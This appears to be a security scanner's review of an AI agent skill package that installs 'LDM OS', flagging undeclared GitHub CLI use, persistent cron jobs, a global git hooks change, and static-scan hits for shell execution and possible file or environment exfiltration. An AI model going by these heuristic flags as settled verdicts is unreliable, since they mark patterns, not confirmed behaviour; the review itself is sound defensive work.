详细分析 ▾
✓ 用途与能力Name/description, package install, and code files are coherent: this is an installer/updater for a local 'LDM OS' and the repo contains CLI, installer, docs, and deployment scripts. Required binaries (git, npm, node) are reasonable for an npm-based CLI installer.
⚠ 指令范围SKILL.md instructs the agent to run many system commands (which ldm, ldm status, ldm install, npm install -g, ldm init, ldm doctor) and to read local reference files included in the package. However: SKILL.md shows example commands using the GitHub CLI ('gh release list', 'gh release view') but 'gh' is not listed in the required binaries. The instructions and changelog indicate the installer will deploy files into ~/.ldm/, write deployed binaries to ~/.ldm/bin/, create cron jobs/LaunchAgents, modify global git hooks, and create docs under home directories — all actions that change the user's environment and have side effects beyond a simple CLI install. SKILL.md states 'Never touch sacred data' but the installer has many aggressive update/deploy behaviors described in changelogs (deploying scripts and backup checks on every update) that warrant user review before running.
ℹ 安装机制Install uses an npm package (@wipcomputer/wip-ldm-os) which is a standard registry mechanism (moderate risk). The code bundle included is large and includes shell scripts, cron hooks, process monitor, and boot hooks that will be written to the user's home. No arbitrary remote URL downloads are shown in the metadata, but the package self-updates and can clone GitHub repos and install other extensions which increases the blast radius if you trust the registry and authors.
⚠ 凭证需求The skill declares no environment variables or credentials (primaryEnv none), which aligns with the metadata. However, runtime behavior will implicitly rely on user-local credentials and services: SSH keys (for private repos), GitHub CLI (used in instructions but not declared), git config modification (it sets core.hooksPath globally), and cron/LaunchAgent privileges. The installer will create and manage persistent files under the user's home, and may read/write iCloud paths per changelog. These are powerful local privileges even without explicit secret env vars.
⚠ 持久化与权限The package is persistent: it installs a CLI binary, deploys files into ~/.ldm/, sets up cron jobs / process-monitor, and alters global git configuration (core.hooksPath → ~/.ldm/hooks). These are significant, persistent changes to a user's environment and may affect all repositories on the machine. The skill is not marked always:true, but its installer logic elevates its footprint and ongoing presence on the system.
⚠ bin/ldm.js:169Shell command execution detected (child_process).
⚠ lib/bootstrap.mjs:18Shell command execution detected (child_process).
⚠ lib/deploy.mjs:63Shell command execution detected (child_process).
⚠ lib/state.mjs:92Shell command execution detected (child_process).
⚠ lib/updates.mjs:131Shell command execution detected (child_process).
⚠ src/bridge/core.ts:122Shell command execution detected (child_process).
⚠ src/bridge/core.ts:15Environment variable access combined with network send.
⚠ src/bridge/core.ts:5File read combined with network send (possible exfiltration).
by